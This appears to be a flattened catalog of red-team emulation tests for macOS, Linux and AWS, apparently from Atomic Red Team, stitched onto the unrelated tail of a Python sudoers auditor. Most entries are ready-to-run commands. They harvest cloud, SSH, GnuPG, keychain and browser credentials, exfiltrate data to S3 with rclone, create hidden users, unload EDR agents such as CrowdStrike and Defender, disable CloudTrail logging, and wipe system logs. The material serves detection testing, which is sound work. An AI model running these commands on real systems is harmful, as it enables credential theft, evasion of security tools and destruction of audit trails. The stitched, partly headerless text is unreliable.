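# Constructed sudoers content for the example (not a real system's file).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset,timestamp_timeout=-1
Defaults mail_badpass
Defaults !tty_tickets
root ALL=(ALL:ALL) ALL
%admin ALL=(ALL) NOPASSWD: ALL
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, \\
    /usr/bin/journalctl -u app
#includedir /etc/sudoers.d
"""

if __name__ == "__main__":
    for number, reason, body in audit_sudoers(SAMPLE_SUDOERS):
        print("line %d: %s  [%s]" % (number, reason, body))
```

Point the auditor at /etc/sudoers.d/* as well, since the tests' `echo ... >> /etc/sudoers` pattern works just as well against any included fragment, and feed the result of `harden()` through `visudo -c -f` before installing it.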
T1552
sh
linux, macos, iaas:aws
AWS - Retrieve EC2 Password Data using stratus
Unsecured Credentials
This atomic runs an API call GetPasswordData from a role that does not have permission to do so. This simulates an attacker attempting to retrieve RDP passwords on a high number of Windows EC2 instances. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ec2-get-password-data/
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.credential-access.ec2-get-password-data
echo "starting detonate"
./stratus detonate aws.credential-access.ec2-get-password-data --force
T1552.001
sh
macos, linux
Find AWS credentials
Credentials In Files
Find local AWS credentials from file, defaults to using / as the look path.
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001
bash
elevated
macos
Extract Browser and System credentials with LaZagne
Credentials In Files
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
python2 laZagne.py all
T1552.001
sh
linux, macos
Extract passwords with grep
Credentials In Files
Extracting credentials from files
grep -ri password #{file_path}
exit 0
T1552.001
bash
linux, macos
Find and Access Github Credentials
Credentials In Files
This test looks for .netrc files (which store GitHub credentials in clear text) and dumps their contents if found.
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001
sh
macos, linux
Find Azure credentials
Credentials In Files
Find local Azure credentials from file, defaults to using / as the look path.
find #{file_path}/.azure -type f \( -name "msal_token_cache.json" -o -name "accessTokens.json" \) 2>/dev/null
T1552.001
sh
macos, linux
Find GCP credentials
Credentials In Files
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
find #{file_path}/.config/gcloud -type f \( -name "credentials.db" -o -name "access_tokens.db" \) 2>/dev/null
T1552.001
sh
macos, linux
Find OCI credentials
Credentials In Files
Find local Oracle cloud credentials from file, defaults to using / as the look path.
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.003
sh
linux, macos
Search Through Bash History
Shell History
Search through bash history for specific commands we want to capture.
grep #{bash_history_grep_args} #{bash_history_filename} > #{output_file}
T1552.004
sh
linux, macos
Discover Private SSH Keys
Private Keys
Discover private SSH keys on a FreeBSD, macOS or Linux system.
find #{search_path} -name id_rsa 2>/dev/null >> #{output_file}
exit 0
T1552.004
sh
macos, linux
Copy Private SSH Keys with rsync
Private Keys
Copy private SSH keys on a Linux or macOS system to a staging folder using the rsync command.
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;
exit 0
T1552.004
sh
macos, linux
Copy the users GnuPG directory with rsync
Private Keys
Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the rsync command.
mkdir #{output_folder}
find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;
exit 0
Gatekeeper Bypass
Gatekeeper Bypass via command line
xattr -d com.apple.quarantine #{app_path}
T1553.004
sh
elevated
macos
Install root CA on macOS
Install Root Certificate
Creates a root CA with openssl
sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}"
Keychain
This command will dump keychain credential information from login.keychain. Source: https://www.loobins.io/binaries/security/ Keychain file paths: ~/Library/Keychains/, /Library/Keychains/, /Network/Library/Keychains/. [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)
sudo security dump-keychain -d login.keychain
T1555.001
sh
macos
Export Certificate Item(s)
Keychain
This command finds all certificate items and sends the output to local file in pem format.
security find-certificate -a -p > #{cert_export}
T1555.001
sh
macos
Import Certificate Item(s) into Keychain
Keychain
This command will import a certificate pem file into a keychain.
security import #{cert_export} -k
T1555.001
sh
macos
Copy Keychain using cat utility
Keychain
This command will copy the keychain using the cat utility in a manner similar to Atomic Stealer.
cat ~/Library/Keychains/login.keychain-db > #{keychain_export}
T1555.003
sh
macos
Search macOS Safari Cookies
Credentials from Web Browsers
This test uses grep to search a macOS Safari binarycookies file for specified values. This was used by CookieMiner malware. Upon successful execution, the macOS shell will cd to ~/Library/Cookies and grep Cookies.binarycookies.
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
T1555.003
sh
macos
Simulating Access to Chrome Login Data - MacOS
Credentials from Web Browsers
This test locates the Login Data files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil. Once the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction. See https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ .
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data"
cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"
T1560.001
bash
elevated
linux, macos
Data Compressed - nix - zip
Archive via Utility
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
zip #{output_file} #{input_files}
T1560.001
sh
linux, macos
Data Compressed - nix - gzip Single File
Archive via Utility
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file})
T1560.001
sh
linux, macos
Data Compressed - nix - tar Folder or File
Archive via Utility
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
tar -cvzf #{output_file} #{input_file_folder}
T1560.001
sh
linux, macos
Data Encrypted with zip and gpg symmetric
Archive via Utility
Encrypt data for exfiltration
mkdir -p #{test_folder}
cd #{test_folder}; touch a b c d e f g
zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./*
echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip
ls -l #{test_folder}
T1560.001
bash
linux, macos
Encrypts collected data with AES-256 and Base64
Archive via Utility
An adversary may compress all the collected data, encrypt and send them to a C2 server using base64 encoding. This atomic test tries to emulate the behaviour of the FLEXIROOT backdoor to archive the collected data. FLEXIROOT typically utilizes AES encryption and base64 encoding to transfer the encrypted data to the C2 server. In this test, standard zip compression and the OpenSSL library are used to encrypt the compressed data. https://attack.mitre.org/versions/v7/software/S0267/
zip -r #{input_folder}/#{input_file}.zip #{input_folder}
openssl enc -aes-256-cbc -pass pass:#{enc_pass} -p -in #{input_folder}/#{input_file}.zip -out #{input_folder}/#{input_file}.enc
cat #{input_folder}/#{input_file}.enc | base64
T1564.001
sh
linux, macos
Create a hidden file in a hidden directory
Hidden Files and Directories
Creates a hidden file inside a hidden directory
mkdir /var/tmp/.hidden-directory
echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file
Hidden Files and Directories
Hide a file on MacOS
xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00"
Hidden Files and Directories
Requires Apple Dev Tools
setfile -a V #(unknown)
Hidden Files and Directories
Hide a directory on MacOS
touch /var/tmp/T1564.001_mac.txt
chflags hidden /var/tmp/T1564.001_mac.txt
Hidden Files and Directories
Show all hidden files on MacOS
defaults write com.apple.finder AppleShowAllFiles YES
T1564.002
sh
elevated
macos
Create Hidden User using UniqueID < 500
Hidden Users
Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default)
sudo dscl . -create /Users/#{user_name} UniqueID 333
T1564.002
sh
elevated
macos
Create Hidden User using IsHidden option
Hidden Users
Add a hidden user on macOS using the IsHidden option
sudo dscl . -create /Users/#{user_name} IsHidden 1
T1567.002
powershell
linux, macos
Exfiltrate data with rclone to cloud Storage - AWS S3
Exfiltration to Cloud Storage
This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3) See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
Write-Host "Deploying AWS infrastructure... " -NoNewLine
$awsAccessKey = "#{aws_access_key}"
$awsSecretKey = "#{aws_secret_key}"
cd PathToAtomicsFolder/T1567.002/src/
if ($awsAccessKey -eq "" -or $awsSecretKey -eq "") {
$env:AWS_PROFILE = "#{aws_profile}"
} else {
$env:AWS_ACCESS_KEY_ID = "$awsAccessKey"
$env:AWS_SECRET_ACCESS_KEY = "$awsSecretKey"
}
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform init
$null = PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform apply -var "aws_region=#{aws_region}" -auto-approve
Write-Host "Done!"
Write-Host "Generating rclone config... " -NoNewLine
$config = @"
[exfils3]
type = s3
provider = AWS
env_auth = true
region = #{aws_region}
"@
$config | Out-File -FilePath "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf" -Encoding ascii
Write-Host "Done!"
Write-Host "Exfiltrating data... " -NoNewLine
$bucket = "$(PathToAtomicsFolder/../ExternalPayloads/T1567.002/terraform-v*/terraform output bucket)".Replace("`"","")
cd PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone-v*
$null = ./rclone copy --max-size 1700k "PathToAtomicsFolder/../ExternalPayloads/T1567.002/data/" exfils3:$bucket --config "PathToAtomicsFolder/../ExternalPayloads/T1567.002/rclone.conf"
Write-Host "Done!"
Launchctl
Utilize launchctl
launchctl submit -l #{label_name} -- #{executable_path}
T1571
sh
linux, macos
Testing usage of uncommonly used port
Non-Standard Port
Testing uncommonly used port utilizing telnet.
echo quit | telnet #{domain} #{port}
exit 0
T1572
bash
linux, macos
Microsoft Dev tunnels (Linux/macOS)
Protocol Tunneling
Dev Tunnels enables insiders as well as threat actors to expose local ports over the internet via Microsoft dev tunnels. This atomic will generate a dev tunnel binding it to the local service running on the provided port. Can be used to expose local services, web applications and local files etc. Reference: - [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview) - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
#{binary_path} host -p #{port} &
T1572
sh
linux, macos
VSCode tunnels (Linux/macOS)
Protocol Tunneling
Visual Studio Code Remote Tunnels can be used for exposing local development environment/services/files over the internet. This atomic will generate a dev tunnel binding it to the local service running on the provided port. Reference: - [Microsoft Docs](https://code.visualstudio.com/docs/remote/tunnels) - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/vscode-server/)
nohup code tunnel --accept-server-license-terms #{additional_args} >/dev/null 2>&1 &
T1572
sh
linux, macos
Cloudflare tunnels (Linux/macOS)
Protocol Tunneling
Cloudflared can be used for exposing local development environment/services/files over the internet. This atomic will generate a dev tunnel binding it to the local service running on the provided port. Reference: - [Cloudflared Docs](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/) - [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/cloudflared/)
nohup #{binary_path} tunnel --url #{url_to_tunnel} #{additional_args} >/dev/null 2>&1 &
T1574.006
bash
macos
Dylib Injection via DYLD_INSERT_LIBRARIES
Dynamic Linker Hijacking
Injects a dylib that opens Calculator via an environment variable
DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
T1580
sh
linux, macos, iaas:aws
AWS - EC2 Enumeration from Cloud Instance
Cloud Infrastructure Discovery
This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets, iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails, ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors) from the context of an EC2 instance role. This simulates an attacker compromising an EC2 instance and running initial discovery commands on it. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "Stratus: Start Warmup."
./stratus warmup aws.discovery.ec2-enumerate-from-instance
echo "Stratus: Start Detonate."
./stratus detonate aws.discovery.ec2-enumerate-from-instance
T1595.003
powershell
windows, linux, macos
Web Server Wordlist Scan
Wordlist Scanning
This test will scan a target system with a wordlist of common directories and file paths.
Import-Module "PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1"
Invoke-WordlistScan -Target "#{target}" -Wordlist "#{wordlist}" -Timeout "#{request_timeout}" -OutputFile "#{output_file}"
Write-Host "Scan complete. Results saved to: #{output_file}"
T1614
bash
macos, linux
Get geolocation info through IP-Lookup services using curl freebsd, linux or macos
System Location Discovery
Get geolocation info through IP-Lookup services using curl on FreeBSD, Linux or macOS. The default URL of the IP-Lookup service is https://ipinfo.io/. References: https://securelist.com/transparent-tribe-part-1/98127/ and https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
curl -k #{ip_lookup_url}
T1647
manual
macos
Plist Modification
Plist File Modification
Modify MacOS plist file in one of two directories
T1652
bash
macos
List loaded kernel extensions (macOS)
Device Driver Discovery
Displays a list of loaded kernel extensions (kexts) on a macOS system.
kextstat
T1652
bash
macos
Find Kernel Extensions (macOS)
Device Driver Discovery
Searches for kernel extension (kext) files on a macOS system.
kextfind
T1659
bash
macos, linux
MITM Proxy Injection
Content Injection
Start mitmdump and verify injected header and HTML content.
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
T1685
sh
elevated
macos
Disable Carbon Black Response
Disable or Modify Tools
Disables Carbon Black Response
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
T1685
sh
elevated
macos
Disable LittleSnitch
Disable or Modify Tools
Disables LittleSnitch
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
T1685
sh
elevated
macos
Disable OpenDNS Umbrella
Disable or Modify Tools
Disables OpenDNS Umbrella
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
T1685
sh
elevated
macos
Disable macOS Gatekeeper
Disable or Modify Tools
Disables macOS Gatekeeper
sudo spctl --master-disable
T1685
sh
elevated
macos
Stop and unload Crowdstrike Falcon on macOS
Disable or Modify Tools
Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}
T1685
sh
elevated
linux, macos
Tamper with Defender ATP on Linux/MacOS
Disable or Modify Tools
With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
sudo mdatp config real-time-protection --value disabled
T1685.002
sh
linux, macos, iaas:aws
AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
Disable or Modify Cloud Log
Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-event-selectors
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force
T1685.002
sh
linux, macos, iaas:aws
AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus
Disable or Modify Cloud Log
This Atomic test uses Stratus Red Team to first set up CloudTrail logging into an S3 bucket and then make an API call to update the lifecycle rule on that S3 bucket with an expiration of 1 day. This will essentially delete all the logs after one day. Adversaries often perform this activity to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force
T1685.002
sh
linux, macos, iaas:aws
AWS - Remove VPC Flow Logs using Stratus
Disable or Modify Cloud Log
This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.vpc-remove-flow-logs
echo "starting detonate"
./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force
Clear Linux or Mac System Logs
Delete system and audit logs
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
T1685.006
sh
elevated
macos
Delete log files using built-in log utility
Clear Linux or Mac System Logs
This test deletes the main log datastore, in-flight log data, time-to-live (TTL) data, and fault and error content
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
T1685.006
sh
elevated
macos
Truncate system log files via truncate utility
Clear Linux or Mac System Logs
This test truncates the system log files using the truncate utility with the -s 0 parameter, which sets the file size to zero and thus empties the file contents
sudo truncate -s 0 #{system_log_path} #size parameter shorthand
T1685.006
sh
elevated
macos
Delete log files via cat utility by appending /dev/null or /dev/zero
Clear Linux or Mac System Logs
The first sub-test truncates the log file to zero bytes via /dev/null, and the second sub-test fills the log file with null bytes (zeroes) via /dev/zero, using the cat and dd utilities
sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
T1685.006
sh
elevated
macos
System log file deletion via find utility
Clear Linux or Mac System Logs
This test finds and deletes the system log files within the /var/log/ directory using several executions (rm, shred, unlink)
sudo find /var/log -name '#{system_log_name1}*' -exec rm {} \; #using "rm" execution
sudo find /var/log -name "#{system_log_name2}*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log -name "#{system_log_name3}*" -exec unlink {} \; #using "unlink" execution
T1685.006
sh
elevated
macos
Overwrite macOS system log via echo utility
Clear Linux or Mac System Logs
This test overwrites the contents of the system log file with an empty string using the echo utility
sudo echo '' > #{system_log_path}
T1685.006
sh
elevated
macos
Real-time system log clearance/deletion
Clear Linux or Mac System Logs
This test reads the real-time system log file and writes an empty string to it, thus clearing the log file without tampering with the logging process
sudo log -f /var/log/system.log | : > /var/log/system.log
T1685.006
sh
elevated
macos
Delete system log files via unlink utility
Clear Linux or Mac System Logs
This test deletes the system log file using the unlink utility
sudo unlink #{system_log_path}
T1685.006
sh
elevated
macos
Delete system log files using shred utility
Clear Linux or Mac System Logs
This test overwrites the contents of the log file with zero bytes (-z) using three passes (-n 3) of data, and then securely deletes the file (-u)
sudo shred -u -z -n 3 #{system_log_path}
T1685.006
sh
elevated
macos
Delete system log files using srm utility
Clear Linux or Mac System Logs
This test securely deletes the system log files individually and recursively using the srm utility. Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm. See https://github.com/khell/homebrew-srm/issues/1 for installation notes.
sudo srm #{system_log_path} #system log file deletion
sudo srm -r #{system_log_folder} #recursive deletion of log files
T1685.006
sh
elevated
macos
Delete system log files using OSAScript
Clear Linux or Mac System Logs
This test deletes the system log file using osascript via "do shell script" (sh/bash by default), which in turn spawns the rm utility; it requires admin privileges
osascript -e 'do shell script "rm #{system_log_path}" with administrator privileges'
T1685.006
sh
elevated
macos
Delete system log files using Applescript
Clear Linux or Mac System Logs
This test deletes the system log file using AppleScript run through osascript via the Finder application. Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully, as part of the TCC (Transparency, Consent, and Control) framework. Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
osascript -e 'tell application "Finder" to delete POSIX file "#{system_log_path}"'
T1690
sh
linux, macos
Disable history collection
Prevent Command History Logging
Disables history collection in shells
export HISTCONTROL=ignoreboth
#{evil_command}
T1690
manual
macos, linux
Mac HISTCONTROL
Prevent Command History Logging
The HISTCONTROL variable is set to ignore (not write to the history file) commands that are duplicates of something already in the history and commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile so that it will apply to all future sessions as well. https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol